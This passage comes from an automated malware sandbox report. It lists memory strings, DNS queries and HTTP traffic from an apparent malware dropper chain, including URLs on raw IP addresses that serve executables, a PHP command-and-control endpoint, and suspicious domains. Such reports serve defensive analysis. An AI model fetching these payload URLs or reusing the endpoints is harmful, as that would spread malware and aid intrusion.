"*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/https://www.baidu.com/,https://www.zhihu.com/,https://www.ifeng.com/,https://weibo.com/,https://www.ctrip.com/,https://www.iqiyi.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB984000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB9A1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2900139173.000001DEF6967000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["*://business.help.royalmail.com/app/webforms/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["*://business.help.royalmail.com/app/webforms/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/[{incognito:null, tabId:null, types:null, urls:["*://business.help.royalmail.com/app/webforms/*"], windowId:null}, ["blocking", "requestHeaders"]] equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://www.amazon.ca/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.amazon.fr/,https://www.leboncoin.fr/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.2955222099.000001D14E80A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000002.2957984264.000001729E70C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.wikipedia.org/,https://www.reddit.com/,https://www.amazon.com/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ipc:first-content-process-createdresource://gre/modules/amManager.sys.mjssitepermsaddon-provider-registeredspeculativeConnectWithOriginAttributes@mozilla.org/spellchecker/engine;1@mozilla.org/network/file-output-stream;1https://smartblock.firefox.etp/play.svg@mozilla.org/addons/addon-manager-startup;1resource://gre/modules/addons/XPIProvider.jsmwebcompat-reporter@mozilla.org.xpiFileUtils_closeSafeFileOutputStream*://static.chartbeat.com/js/chartbeat.js*://static.criteo.net/js/ld/publishertag.js*://*.imgur.com/js/vendor.*.bundle.js*://libs.coremetrics.com/eluminate.js*://track.adform.net/serving/scripts/trackpoint/@mozilla.org/network/atomic-file-output-stream;1*://auth.9c9media.ca/auth/main.js*://*.imgur.io/js/vendor.*.bundle.jsresource://gre/modules/FileUtils.sys.mjs*://www.rva311.com/static/js/main.*.chunk.js*://c.amazon-adsystem.com/aax2/apstag.js*://connect.facebook.net/*/all.js**://www.everestjs.net/static/st.v3.js**://connect.facebook.net/*/sdk.js*pictureinpicture%40mozilla.org:1.0.0@mozilla.org/network/safe-file-output-stream;1*://static.chartbeat.com/js/chartbeat_video.jshttps://smartblock.firefox.etp/facebook.svgresource://gre/modules/TelemetryStorage.sys.mjs equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2880681828.000001DEFA65E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 0000001C.00000003.2890160247.000001DEF9D9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2925250004.000001DEF10F3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: atten-supporse.biz
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: support.mozilla.org
Source: global traffic DNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: home.twentykx20pt.top
Source: global traffic DNS traffic detected: DNS query: www.facebook.com
Source: global traffic DNS traffic detected: DNS query: www.wikipedia.org
Source: global traffic DNS traffic detected: DNS query: www.youtube.com
Source: global traffic DNS traffic detected: DNS query: star-mini.c10r.facebook.com
Source: global traffic DNS traffic detected: DNS query: youtube-ui.l.google.com
Source: global traffic DNS traffic detected: DNS query: dyna.wikimedia.org
Source: global traffic DNS traffic detected: DNS query: www.reddit.com
Source: global traffic DNS traffic detected: DNS query: twitter.com
Source: global traffic DNS traffic detected: DNS query: reddit.map.fastly.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001242000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2901005763.0000000001258000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/luma/random.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2954316524.000000000113A000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeI
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeze
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe7
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/random.exe:
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exe
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeC
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/steam/random.exeo
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/well/random.exeR
Source: a6f0d09f38.exe, 0000000D.00000002.2960178454.00000000012AC000.00000004.00000020.00020000.00000000.sdmp, a6f0d09f38.exe, 0000000D.00000003.2894772771.00000000012AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16:80/off/def.exe
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php/
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpG
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpw
Source: b5da647ae3.exe, 0000000E.00000002.2642307594.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206?
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2957851747.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2957851747.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000EEE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exeD
Source: skotes.exe, 00000006.00000002.2957851747.0000000000E9B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/6802601040/SxQyhJr.exeshqos.dll
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique1/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe1
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe1aa;
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe6%
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe60N
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe60ac02b4ded8abeee1fbdemp
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe7d
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exe7d1
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exed
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exeedQ
Source: skotes.exe, 00000006.00000002.2957851747.0000000000F1C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/unique2/random.exej
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEAD72000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: firefox.exe, 0000001C.00000002.3044748251.000001DEEBF1A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: a6f0d09f38.exe, 0000000D.00000003.2629187610.0000000005BB9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 0000001C.00000002.3012755816.000001DEEACC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2890160247.000001DEF9D44000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEBD8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3025366411.000001DEEB96A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 0000001C.00000002.3025366411.000001DEEB938000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2875741877.000001DEFABD9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.2957507793.000001C8C38E0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.2963835529.000001D14E900000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000021.00000002.2954205444.000001729E4E0000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA32D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressionsp
Source: firefox.exe, 0000001C.00000002.2995338805.000001DEEA38A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 0000001C.00000002.2978589406.000001DEDEB03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp, 98a7b9f337.exe, 00000022.00000003.2918095240.0000000007629000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFf736
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFfO1732855736
Source: 98a7b9f337.exe, 00000022.00000002.2951837128.000000000145A000.00000040.00000001.01000000.0000001B.sdmp String found in binary or memory: http://home.twentykx20pt.top/bugEWhhZIPIipxajeFfO1732855736http://home.twentykx20pt.top/bugEWhhZIPIi
Source: firefox.exe, 0000001C.00000003.2822675345.000001DEF908F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 0000001C.00000002.3019407940.000001DEEADDD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
